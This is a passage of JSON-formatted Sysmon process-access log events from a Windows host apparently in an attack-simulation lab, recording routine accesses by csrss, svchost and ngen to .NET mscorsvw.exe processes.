l+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7097,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:20.585\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2240-5F25-0000-001043F50B00}\r\nTargetProcessId: 3996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:20.585","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2240-5F25-0000-001043F50B00}","TargetProcessId":"3996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7098,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:20.585\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2240-5F25-0000-001043F50B00}\r\nTargetProcessId: 3996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:20.585","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2240-5F25-0000-001043F50B00}","TargetProcessId":"3996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7099,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:20.663\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-00107C430B00}\r\nTargetProcessId: 2872\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:20.663","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-00107C430B00}","TargetProcessId":"2872","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7100,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:20.663\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-00107C430B00}\r\nTargetProcessId: 2872\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:20.663","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-00107C430B00}","TargetProcessId":"2872","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7101,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:20.663\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-00107C430B00}\r\nTargetProcessId: 2872\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:20.663","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-00107C430B00}","TargetProcessId":"2872","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7102,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:20.710\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2240-5F25-0000-001034FC0B00}\r\nTargetProcessId: 3292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:20.710","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2240-5F25-0000-001034FC0B00}","TargetProcessId":"3292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7103,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:20.710\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2240-5F25-0000-001034FC0B00}\r\nTargetProcessId: 3292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:20.710","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2240-5F25-0000-001034FC0B00}","TargetProcessId":"3292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7104,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:20.710\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2240-5F25-0000-001034FC0B00}\r\nTargetProcessId: 3292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:20.710","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2240-5F25-0000-001034FC0B00}","TargetProcessId":"3292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+5